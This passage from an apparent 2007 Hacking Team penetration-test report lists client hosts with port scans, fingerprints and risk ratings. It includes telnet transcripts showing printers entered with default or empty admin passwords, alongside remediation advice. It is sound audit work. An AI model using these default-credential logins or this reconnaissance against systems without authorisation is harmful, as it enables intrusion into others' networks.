Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname MIL-BADGE G-PRO COMPUTER
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
5900/tcp open tcpwrapped
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 297 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.12.44 100.100.200.181 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Not detected Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
All 1697 scanned ports on 100.100.200.181 are filtered
OS details: 2wire wireless broadband router version 3.5.55, Cisco DOCSIS cable
modem termination server running IOS 12.1, Cisco Catalyst 65$
OS Fingerprint:
OS:SCAN(V=4.20%D=7/14%OT=%CT=%CU=%PV=N%G=N%TM=46988321%P=i686-pc-linux-gnu)
OS:U1(R=N)IE(R=N)
On this IP there is an alive host in hidden mode.
6.12.45 100.100.200.182 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Not detected Version Not detected
Hostname Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 298 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
All 1697 scanned ports on 100.100.200.182 are filtered
OS details: 2wire wireless broadband router version 3.5.55, Cisco DOCSIS cable
modem termination server running IOS 12.1, Cisco Catalyst 65$
OS Fingerprint:
OS:SCAN(V=4.20%D=7/14%OT=%CT=%CU=%PV=N%G=N%TM=4698839A%P=i686-pc-linux-gnu)
OS:U1(R=N)IE(R=N)
On this IP there is an alive host in hidden mode.
6.12.46 100.100.200.183 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Not detected Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
All 1697 scanned ports on 100.100.200.183 are filtered
OS details: 2wire wireless broadband router version 3.5.55, Cisco DOCSIS cable
modem termination server running IOS 12.1, Cisco Catalyst 65$
OS Fingerprint:
OS:SCAN(V=4.20%D=7/16%OT=%CT=%CU=%PV=N%G=N%TM=469B81C7%P=i686-pc-linux-gnu)
OS:U1(R=N)IE(R=N)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 299 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
On this IP there is an alive host in hidden mode.
6.12.47 100.100.200.190 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows, Intel Version Not detected
Hostname MILSIAWS04 MTSMARKETS
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
1050/tcp open msrpc Microsoft Windows RPC
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.13 Workstations in Network 100.100.100.0/24
6.13.1 100.100.100.81 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 300 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised Compromised by Active
Directory
Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
6.13.2 100.100.100.5 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 301 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft RPC
139/tcp open netbios-ssn
1032/tcp open msrpc Microsoft Windows RPC
1417/tcp open tcpwrapped
1420/tcp open tcpwrapped
1433/tcp open ms-sql-s?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=40 (Good luck!)
IPID Sequence Generation: Randomized
Service Info: OS: Windows
6.13.3 100.100.100.6 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Not detected 1/10
Vendor/OS Not detected Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
OS detection will be MUCH less reliable because we did not find at least 1 open
and 1 closed TCP port
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 302 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.13.4 100.100.100.7 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
113/tcp open auth?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.13.5 100.100.100.10 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 303 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname PC_TONY_S
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
OS detection will be MUCH less reliable because we did not find at least 1 open
and 1 closed TCP port
A web server seems to be running on port 80 (HTTP):
HTTP/1.0 404 Not Found
6.13.6 100.100.100.11 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1417/tcp open tcpwrapped
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 304 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Service Info: OS: Windows
6.13.7 100.100.100.40 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1417/tcp open tcpwrapped
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.13.8 100.100.100.41 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 305 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.13.9 100.100.100.44 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
113/tcp open auth?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 306 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1417/tcp open tcpwrapped
1418/tcp open tcpwrapped
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.13.10 100.100.100.45 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 307 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.13.11 100.100.100.46 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1417/tcp open tcpwrapped
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.13.12 100.100.100.47 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 308 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1417/tcp open tcpwrapped
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.13.13 100.100.100.97 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1417/tcp open tcpwrapped© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 309 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.14 Printers
6.15 Printers in Network 192.168.254.0/24
No printers have been identified in this network.
6.16 Printers in Network 192.168.244.0/24
No printers have been identified in this network.
6.17 Printers in Network 192.168.210.0/24
6.17.1 192.168.210.40 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; update firmare/OS to the latest available release; replace telnet access
with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version HP Jet-Direct Print Server
Hostname Not detected
Compromised Compromised Directly Info Weak password
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 310 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Auth (null)
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet?
80/tcp open http HP Jetdirect httpd
280/tcp open http HP Jetdirect httpd
515/tcp open printer
631/tcp open http HP Jetdirect httpd
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Device: print server
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It was possible to login in the Telnet administration by trying a default password set.
6.17.2 192.168.210.41 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; update firmare/OS to the latest available release
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version HP Jet-Direct Print Server
Hostname Not detected
Compromised Compromised Directly Info Weak password
Auth (null)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 311 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
80/tcp open http HP Jetdirect httpd
280/tcp open http HP Jetdirect httpd
515/tcp open printer
631/tcp open http HP Jetdirect httpd
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
It was possible to login in the administration by tying a default password set.
6.17.3 192.168.210.42 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4100 Series
Hostname NPI552D0C
Compromi
sed
Compromised Directly Info Admin with no password
Auth Not needed
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
280/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
515/tcp open printer
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 312 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
631/tcp open http HP JetDirect printer webadmin (HP-ChaiServer 3.0)
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It was possible to login in the administration by tying a default password set:
Trying 192.168.210.42...
Connected to 192.168.210.42.
Escape character is '^]'.
HP JetDirect
Password is not set
Please type "menu" for the MENU system,
or "?" for help, or "/" for current settings.
>
> help
Help Menu
Type one "Command" followed by one of its valid "Values".
Command: Values:
--------------- --------------------------
? [displays Help menu]
/ [Display current values]
# [Comment Line]
menu [Enter Menu]
advanced [Enable Advanced commands]
general [Disable Advanced commands] (default)
save [Save settings and exit]
exit [exit]
export [Export settings to edit and import via Telnet or TFTP]
GENERAL____________________________________
passwd <new-password> <retype-new-password> (16 chars max)
sys-location alpha-numeric string (255 chars max)
sys-contact alpha-numeric string (255 chars max)
TCP/IP MAIN________________________________© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 313 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
host-name alpha-numeric string (32 chars max)
ip-config MANUAL, BOOTP, DHCP
ip IP address in dotted notation, 0.0.0.0 to disable
subnet-mask IP address in dotted notation, 0.0.0.0 to disable
default-gw IP address in dotted notation, 0.0.0.0 to disable
domain-name alpha-numeric string (255 chars max)
dns-svr IP address in dotted notation, 0.0.0.0 to disable
pri-wins-svr IP address in dotted notation, 0.0.0.0 to disable
sec-wins-svr IP address in dotted notation
TCP/IP PRINT OPTIONS_______________________
9100-printing 0 to disable, 1 to enable (TCP port 9100)
ftp-printing 0 to disable, 1 to enable (TCP port 20, 21)
ipp-printing 0 to disable, 1 to enable (TCP port 631)
lpd-printing 0 to disable, 1 to enable (TCP port 515)
banner 0 to disable, 1 to enable
TCP/IP RAW PRINT PORTS_____________________
raw-port port(3000..9000), [2]
TCP/IP ACCESS CONTROL______________________
allow IP address (and optional mask) in dotted notation, [10]
TCP/IP OTHER_______________________________
syslog-config 0 to disable, 1 to enable (UDP port 514)
syslog-svr IP address in dotted notation, 0.0.0.0 to disable
syslog-max integer (1..1000), 0 to disable
syslog-priority integer (0..7), 8 to disable
slp-config 0 to disable, 1 to enable (UDP port 427)
ttl-slp integer (1..15), -1 to disable
idle-timeout integer (1..3600) seconds, 0 to disable
user-timeout integer (1..3600) seconds, 0 to disable
telnet-timeout integer (1..3600) seconds, 0 to disable
cold-reset 1=Set TCP Factory Defaults, 0=normal
ews-config 0 to disable, 1 to enable (TCP port 80)
tcp-mss integer (0,1,2)
SNMP_______________________________________
snmp-config 0 to disable, 1 to enable
NOTE: Disabling this parameter will disable communication
with WebJetAdmin and JetAdmin
get-cmnty-name alpha-numeric string (255 chars max)
set-cmnty-name alpha-numeric string (255 chars max)
trap-cmnty-name alpha-numeric string (32 chars max)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 314 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
SNMP TRAPS_________________________________
auth-trap 0 to disable, 1 to enable
trap-dest IP address in dotted notation, 0.0.0.0 to disable,[12]
IPX/SPX____________________________________
ipx-config 0 to disable, 1 to enable
ipx-unitname alpha-numeric string (31 chars max)
ipx-frametype (AUTO, EN_8022, EN_8023, EN_II, EN_SNAP
Note: Only TR_8022, TR_SNAP, AUTO are supported on Token Ring)
ipx-sapinterval integer (1..3600) seconds, 0 to disable
ipx-nds-tree alpha-numeric string (31 chars max)
ipx-nds-context alpha-numeric string (256 chars max)
ipx-job-poll integer (1..255) seconds
pjl-banner 0 to disable, 1 to enable
pjl-eoj 0 to disable, 1 to enable
pjl-toner-low 0 to disable, 1 to enable
APPLETALK__________________________________
appletalk 0 to disable, 1 to enable
DLC/LLC____________________________________
dlc/llc-config 0 to disable, 1 to enable
OTHER______________________________________
panic-behavior NONE_SUPPORTED, DUMP_AND_REBOOT, JUST_REBOOT,
DUMP_AND_HALT, JUST_HALT, FULL_DUMP_AND_REBOOT, FULL_DUMP_AND_HALT
SUPPORT____________________________________
support-name alpha-numeric string (255 chars max)
support-number alpha-numeric string (255 chars max)
support-url alpha-numeric string (255 chars max)
tech-support-url alpha-numeric string (255 chars max)
___________________________________________
Examples:
ip: 15.29.44.99 <ENTER> [sets IP address to 15.29.44.99]
idle-timeout: 65 <ENTER> [sets timeout to 65 seconds]
allow: <ENTER> [deletes allow table, selects first element]
allow: 15.29.44.29 <ENTER> [set allow[1] with IP, default mask]
allow: 15.29.40 255.255.248.0 <ENTER> [set allow[2] with subnet mask]
cold-reset <ENTER> [set TCP factory defaults]
passwd-admin: j71fa j71fa [set admin password]
port: 1 <ENTER> [selects port 1 for banner command]
banner: 1 <ENTER> [enables banner page]
exit <ENTER> [exit]
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 315 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
(Read-Only) values may have been automatically set by BOOTP, DHCP or RARP.
To unlock these, type "ip-config manual" to switch to manual configuration.
Type "?" for HELP, "/" for current settings or "exit" to exit.
6.17.4 192.168.210.44 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Ricoh Version Aficio CL7200
Hostname RNP9D8D38
Compromised Compromised Directly Info Weak password
Auth admin:(null)
The host was alive and these additional information could be extracted:
21/tcp open ftp Ricoh Aficio CL7200 printer ftpd 5.08.1
23/tcp open telnet?
80/tcp open http Ricoh Afficio printer web image monitor (Web-Server
httpd 3.0)
139/tcp open tcpwrapped
514/tcp open shell?
515/tcp open printer lpd (error: Illegal service request)
631/tcp open ipp?
9100/tcp open jetdirect?
Uptime: 50.344 days (since Wed May 30 15:44:50 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=211 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Device: printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 316 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
It was possible to login in the administration by tying a default password set:
Trying 192.168.210.44...
Connected to 192.168.210.44.
Escape character is '^]'.
RICOH Maintenance Shell.
User access verification.
login:root
Password:
Incorrect password
login:
Password:
Incorrect password
login:admin
Password:
User access verification ... OK.
RICOH Aficio CL7200
Network Control Service Ver. 5.08.1
Copyright (C) 1994-2004 Ricoh Co.,Ltd. All rights reserved.
msh>
6.17.5 192.168.210.47 [Compromised]
Rating: compromised
Vulnerabilities found: V2
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Xerox Version Phaser 8400
Hostname PHASER 8400N
Compromised Compromised Directly Info Admin with no password
Auth Not needed
The host was alive and these additional information could be extracted:
7/tcp open echo
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 317 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
9/tcp open discard?
19/tcp open chargen xinetd chargen
21/tcp open ftp Phaser printer ftpd
80/tcp open http Xerox printer webadmin (Printer 8400N; Embedded
Allegro-Software-RomPager 4.10)
427/tcp open svrloc?
515/tcp open printer
631/tcp open http Xerox printer webadmin (Printer 8400N; Embedded
Allegro-Software-RomPager 4.10)
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Unix; Device: printer
It was possible to login in the administration by tying a default password set.
6.17.6 192.168.210.48 [Compromised]
Rating: compromised
Vulnerabilities found: V2
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version Officejet 7200 series
Hostname HP000D9D28D567
Compromised Compromised Directly Info Admin with no password
Auth Not needed
The host was alive and these additional information could be extracted:
80/tcp open http HP PhotoSmart 8450 printer http config (Virata
embedded httpd 6_0_1)
139/tcp open netbios-ssn?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 318 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
9100/tcp open jetdirect?
9101/tcp open jetdirect?
9102/tcp open jetdirect?
Uptime: 21.479 days (since Thu Jun 28 12:33:42 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=17 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Device: printer
It was possible to login in the administration by tying a default password set.
6.18 Printers in Network 100.100.200.0/24
6.18.1 100.100.200.47 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
